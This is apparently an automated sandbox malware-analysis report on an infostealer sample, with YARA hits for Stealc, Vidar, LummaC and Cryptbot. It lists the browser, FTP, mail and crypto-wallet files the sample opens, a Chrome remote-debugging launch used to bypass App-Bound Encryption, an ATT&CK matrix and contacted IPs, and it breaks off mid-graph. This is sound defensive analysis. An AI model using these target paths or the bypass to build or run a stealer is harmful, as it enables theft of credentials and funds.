                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\formhistory.sqlite
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
                      Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite-walJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
                      Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite-shmJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\key4.db
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
                      Tries to harvest and steal ftp login credentials
                      Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfo
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeFile opened: C:\Users\user\AppData\Roaming\FTPbox
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeFile opened: C:\Users\user\AppData\Roaming\FTPRush
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetter
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTP
                      Tries to steal Crypto Currency Wallets
                      Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\MultiDoge\Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Binance\Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\config\Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeFile opened: C:\Users\user\AppData\Roaming\Binance
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeFile opened: C:\Users\user\AppData\Roaming\Binance
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
                      Tries to steal Mail credentials (via file / registry access)
                      Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeDirectory queried: C:\Users\user\Documents
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeDirectory queried: C:\Users\user\Documents
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeDirectory queried: C:\Users\user\Documents\BNAGMGSPLO
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeDirectory queried: C:\Users\user\Documents\BNAGMGSPLO
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXA
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXA
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeDirectory queried: C:\Users\user\Documents\GIGIYTFFYT
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeDirectory queried: C:\Users\user\Documents\GIGIYTFFYT
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeDirectory queried: C:\Users\user\Documents\NYMMPCEIMA
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeDirectory queried: C:\Users\user\Documents\NYMMPCEIMA
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeDirectory queried: C:\Users\user\Documents\BNAGMGSPLO
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeDirectory queried: C:\Users\user\Documents\BNAGMGSPLO
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeDirectory queried: C:\Users\user\Documents
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeDirectory queried: C:\Users\user\Documents
                      Source: Yara matchFile source: 00000021.00000003.3029423609.00000000011FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000021.00000003.3141958097.00000000011F1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000021.00000003.3029009486.00000000011F4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000019.00000003.2909497390.0000000000DDF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000019.00000003.2930042861.0000000000DD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000021.00000003.3115502642.00000000011EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000021.00000003.3126917741.00000000011F1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000019.00000003.2930115456.0000000000DE0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000019.00000003.2868675693.0000000000DDE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000021.00000003.3056107294.00000000011FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000019.00000003.2866546658.0000000000DD1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000019.00000003.2886934243.0000000000DDF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000019.00000003.2925047603.0000000000DD7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000019.00000003.2897278924.0000000000DDF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: file.exe PID: 5740, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: 8eeb449c35.exe PID: 9052, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: 8eeb449c35.exe PID: 5932, type: MEMORYSTR

                      Remote Access Functionality

                      barindex
                      Attempt to bypass Chrome Application-Bound Encryption
                      Source: C:\Users\user\Desktop\file.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default"
                      Yara detected Credential Flusher
                      Source: Yara matchFile source: 0000001C.00000003.2922185232.0000000000CE3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 846d486827.exe PID: 7752, type: MEMORYSTR
                      Yara detected Cryptbot
                      Source: Yara matchFile source: dump.pcap, type: PCAP
                      Yara detected LummaC Stealer
                      Source: Yara matchFile source: Process Memory Space: 8eeb449c35.exe PID: 9052, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: 8eeb449c35.exe PID: 5932, type: MEMORYSTR
                      Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                      Yara detected Stealc
                      Source: Yara matchFile source: 0000001A.00000003.2894414344.0000000005820000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2589542776.000000000180E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001A.00000002.2940433964.0000000001A1E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002F.00000002.3202658017.0000000000A0B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002F.00000002.3205756380.0000000000E41000.00000040.00000001.01000000.00000011.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2588317062.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002F.00000003.3063493527.0000000004CA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.2220319190.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001A.00000002.2938763299.0000000000E41000.00000040.00000001.01000000.00000011.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: file.exe PID: 5740, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: 241fdb96f6.exe PID: 8452, type: MEMORYSTR
                      Source: Yara matchFile source: dump.pcap, type: PCAP
                      Yara detected Vidar stealer
                      Source: Yara matchFile source: 00000000.00000002.2589542776.000000000180E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: file.exe PID: 5740, type: MEMORYSTR

                      Mitre Att&ck Matrix

                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity InformationAcquire InfrastructureValid Accounts21
                      Windows Management Instrumentation                      		1
                      DLL Side-Loading                      		1
                      DLL Side-Loading                      		411
                      Disable or Modify Tools                      		2
                      OS Credential Dumping                      		1
                      System Time Discovery                      		Remote Services11
                      Archive Collected Data                      		11
                      Ingress Tool Transfer                      		Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault Accounts1
                      Native API                      		1
                      Scheduled Task/Job                      		2
                      Bypass User Account Control                      		21
                      Deobfuscate/Decode Files or Information                      		LSASS Memory12
                      File and Directory Discovery                      		Remote Desktop Protocol41
                      Data from Local System                      		21
                      Encrypted Channel                      		Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain Accounts2
                      Command and Scripting Interpreter                      		11
                      Registry Run Keys / Startup Folder                      		1
                      Extra Window Memory Injection                      		4
                      Obfuscated Files or Information                      		Security Account Manager248
                      System Information Discovery                      		SMB/Windows Admin Shares1
                      Email Collection                      		1
                      Remote Access Software                      		Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal Accounts1
                      Scheduled Task/Job                      		Login Hook112
                      Process Injection                      		12
                      Software Packing                      		NTDS11
                      Query Registry                      		Distributed Component Object ModelInput Capture3
                      Non-Application Layer Protocol                      		Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud Accounts2
                      PowerShell                      		Network Logon Script1
                      Scheduled Task/Job                      		1
                      DLL Side-Loading                      		LSA Secrets881
                      Security Software Discovery                      		SSHKeylogging114
                      Application Layer Protocol                      		Scheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts11
                      Registry Run Keys / Startup Folder                      		2
                      Bypass User Account Control                      		Cached Domain Credentials2
                      Process Discovery                      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                      Extra Window Memory Injection                      		DCSync371
                      Virtualization/Sandbox Evasion                      		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job121
                      Masquerading                      		Proc Filesystem1
                      Application Window Discovery                      		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                      Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt371
                      Virtualization/Sandbox Evasion                      		/etc/passwd and /etc/shadow1
                      Remote System Discovery                      		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                      IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron112
                      Process Injection                      		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1559251 Sample: file.exe Startdate: 20/11/2024 Architecture: WINDOWS Score: 100 129 cook-rain.sbs 2->129 131 youtube.com 2->131 133 16 other IPs or domains 2->133 161 Suricata IDS alerts for network traffic 2->161 163 Found malware configuration 2->163 165 Antivirus / Scanner detection for submitted sample 2->165 167 14 other signatures 2->167 12 file.exe 37 2->12         started        17 8eeb449c35.exe 2->17         started        19 skotes.exe 2->19         started        21 4 other processes 2->21 signatures3 process4 dnsIp5 141 185.215.113.206, 49742, 49832, 49910 WHOLESALECONNECTIONSNL Portugal 12->141 143 185.215.113.16 WHOLESALECONNECTIONSNL Portugal 12->143 145 127.0.0.1 unknown unknown 12->145 103 C:\Users\user\DocumentsKJEGCFBGDH.exe, PE32 12->103 dropped 105 C:\Users\user\AppData\...\softokn3[1].dll, PE32 12->105 dropped 107 C:\Users\user\AppData\Local\...\random[1].exe, PE32 12->107 dropped 109 11 other files (3 malicious) 12->109 dropped 187 Detected unpacking (changes PE section rights) 12->187 189 Attempt to bypass Chrome Application-Bound Encryption 12->189 191 Drops PE files to the document folder of the user 12->191 207 7 other signatures 12->207 23 cmd.exe 12->23         started        25 msedge.exe 2 10 12->25         started        28 chrome.exe 12->28         started        193 Query firmware table information (likely to detect VMs) 17->193 195 Tries to harvest and steal ftp login credentials 17->195 197 Tries to harvest and steal browser information (history, passwords, etc) 17->197 199 Hides threads from debuggers 19->199 201 Tries to detect sandboxes / dynamic malware analysis system (registry check) 19->201 203 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 19->203 205 Maps a DLL or memory area into another process 21->205 31 msedge.exe 21->31         started        34 firefox.exe 21->34         started        36 msedge.exe 21->36         started        38 5 other processes 21->38 file6 signatures7 process8 dnsIp9 40 DocumentsKJEGCFBGDH.exe 23->40         started        44 conhost.exe 23->44         started        169 Monitors registry run keys for changes 25->169 46 msedge.exe 25->46         started        147 192.168.2.6, 443, 49706, 49708 unknown unknown 28->147 149 239.255.255.250 unknown Reserved 28->149 48 chrome.exe 28->48         started        151 13.107.246.40, 443, 49954, 49964 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 31->151 153 20.110.205.119, 443, 49945, 49963 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 31->153 157 21 other IPs or domains 31->157 111 C:\Users\user\AppData\Local\...\Cookies, SQLite 31->111 dropped 155 youtube.com 142.250.186.142 GOOGLEUS United States 34->155 159 5 other IPs or domains 34->159 51 firefox.exe 34->51         started        53 firefox.exe 34->53         started        55 conhost.exe 38->55         started        file10 signatures11 process12 dnsIp13 93 C:\Users\user\AppData\Local\...\skotes.exe, PE32 40->93 dropped 171 Multi AV Scanner detection for 